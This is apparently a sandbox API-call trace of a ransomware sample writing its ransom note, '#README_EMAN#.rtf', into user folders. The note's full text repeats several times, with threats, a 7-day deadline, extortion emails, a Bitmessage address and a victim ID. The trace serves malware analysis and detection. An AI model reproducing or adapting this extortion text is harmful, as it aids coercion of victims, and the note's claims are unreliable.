br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.357] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.358] CloseHandle (hObject=0x2e8) returned 1 [0289.358] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\#readme_eman#.rtf")) returned 0xffffffff [0289.358] GetLastError () returned 0x2 [0289.358] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.358] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.358] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.358] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh 